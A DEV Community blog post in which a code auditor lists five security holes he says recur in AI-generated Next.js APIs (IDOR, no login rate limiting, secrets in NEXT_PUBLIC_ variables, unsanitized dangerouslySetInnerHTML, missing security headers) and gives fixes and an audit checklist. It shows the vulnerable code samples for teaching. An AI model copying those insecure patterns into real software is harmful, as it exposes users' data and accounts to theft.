DEV Community

JSGuruJobs
JSGuruJobs

Posted on

AI Generated Your API. Here Are the 5 Security Holes It Left Behind.

I audit JavaScript codebases for a living. Over the past two months, every single codebase that was primarily AI generated had the same five security vulnerabilities. Not similar. The same. Identical patterns across different teams, different products, different AI tools.

AI tools produce the same blind spots because they are trained on the same tutorials where security was an afterthought. Here are the five holes and the exact code to fix each one.

Hole 1. Missing Ownership Check on Every Data Endpoint

This is the one that keeps me up at night. AI generates API routes that fetch data by ID without checking who is asking.

What AI generates:

export async function GET(req: Request, { params }: { params: { id: string } }) {
  const invoice = await db.invoice.findUnique({
    where: { id: params.id }
  })

  if (!invoice) return Response.json({ error: "Not found" }, { status: 404 })
  return Response.json(invoice)
}
Enter fullscreen mode Exit fullscreen mode

Any authenticated user changes /api/invoices/abc123 to /api/invoices/xyz789 and reads someone else's invoice. This is IDOR. It was in 4 out of 6 apps I reviewed last month.

The fix is one line:

const invoice = await db.invoice.findUnique({
  where: {
    id: params.id,
    userId: session.userId  // this line prevents IDOR
  }
})
Enter fullscreen mode Exit fullscreen mode

Attacker gets 404 instead of your customer's data. Test every endpoint in your app right now: log in as User A, copy the token, log in as User B, use B's token to request A's resources. If it works, you have a breach waiting to happen.

Hole 2. Zero Rate Limiting on Auth Endpoints

None of the six apps I reviewed had rate limiting on login. Not one. An attacker can brute force passwords at 10,000 attempts per minute indefinitely.

Fix with Upstash in under 20 lines:

import { Ratelimit } from "@upstash/ratelimit"
import { Redis } from "@upstash/redis"

const limiter = new Ratelimit({
  redis: Redis.fromEnv(),
  limiter: Ratelimit.slidingWindow(5, "15 m"),
})

export async function POST(req: Request) {
  const ip = req.headers.get("x-forwarded-for") ?? "unknown"
  const { success } = await limiter.limit(ip)

  if (!success) {
    return Response.json(
      { error: "Too many attempts. Try again later." },
      { status: 429 }
    )
  }

  // process login
}
Enter fullscreen mode Exit fullscreen mode

Five attempts per 15 minutes per IP. Adjust the numbers for your use case but never ship a login endpoint with zero limits.

Hole 3. Secrets in NEXT_PUBLIC_ Variables

Two out of six apps had database connection strings and Stripe secret keys behind the NEXT_PUBLIC_ prefix. These values get bundled into client JavaScript. Anyone opens DevTools, searches the JS files, and has your database credentials.

Audit command you should run right now:

grep -r "NEXT_PUBLIC_" .env* --include="*.env*"
Enter fullscreen mode Exit fullscreen mode

Every result that contains a database URL, a secret API key, a JWT signing secret, or a payment processor secret key needs the NEXT_PUBLIC_ prefix removed immediately. Move the API call to a Server Component or Server Action where the variable stays server side.

Things that are safe as NEXT_PUBLIC_: Stripe publishable keys, analytics IDs, public API endpoints. Everything else stays server only.

Hole 4. dangerouslySetInnerHTML Without Sanitization

AI generates this pattern constantly for any kind of rich text rendering:

<div dangerouslySetInnerHTML={{ __html: post.content }} />
Enter fullscreen mode Exit fullscreen mode

If post.content ever contains user input at any point in the data chain, this is a stored XSS vulnerability. Script tags execute in every visitor's browser.

Fix with DOMPurify:

import DOMPurify from "isomorphic-dompurify"

<div dangerouslySetInnerHTML={{
  __html: DOMPurify.sanitize(post.content, {
    ALLOWED_TAGS: ["p", "strong", "em", "a", "br", "ul", "li", "h2", "h3"],
    ALLOWED_ATTR: ["href", "target", "rel"]
  })
}} />
Enter fullscreen mode Exit fullscreen mode

Whitelist only the tags you actually need. Everything else gets stripped. And add a Content Security Policy header that blocks inline scripts as a second layer of defense.

Hole 5. No Security Headers at All

Every app I reviewed had zero custom security headers. Five minutes in middleware fixes this.

export function middleware(request: NextRequest) {
  const response = NextResponse.next()

  response.headers.set(
    "Strict-Transport-Security",
    "max-age=31536000; includeSubDomains"
  )
  response.headers.set("X-Content-Type-Options", "nosniff")
  response.headers.set("X-Frame-Options", "DENY")
  response.headers.set(
    "Referrer-Policy",
    "strict-origin-when-cross-origin"
  )
  response.headers.set(
    "Permissions-Policy",
    "camera=(), microphone=(), geolocation=()"
  )

  return response
}
Enter fullscreen mode Exit fullscreen mode

Scan your production URL at securityheaders.com. Anything below B grade means you are missing basic protections that take minutes to add.

The 30 Minute Audit

Run all five checks on your codebase this afternoon:

1. Test every API endpoint with a different user's credentials. Any success response is an IDOR.

2. Attempt 100 failed logins in rapid succession. If nothing blocks you, rate limiting is missing.

3. Run grep -r "NEXT_PUBLIC_" .env* and review every result.

4. Search the codebase for dangerouslySetInnerHTML and trace each one back to its data source.

5. Scan your production URL at securityheaders.com.

Five checks. Thirty minutes. These catch the vulnerabilities that exist in the overwhelming majority of AI generated JavaScript applications shipping to production right now.

AI was trained to be helpful, not paranoid. Your job is to be both.

More practical security and architecture patterns at jsgurujobs.com.

Top comments (0)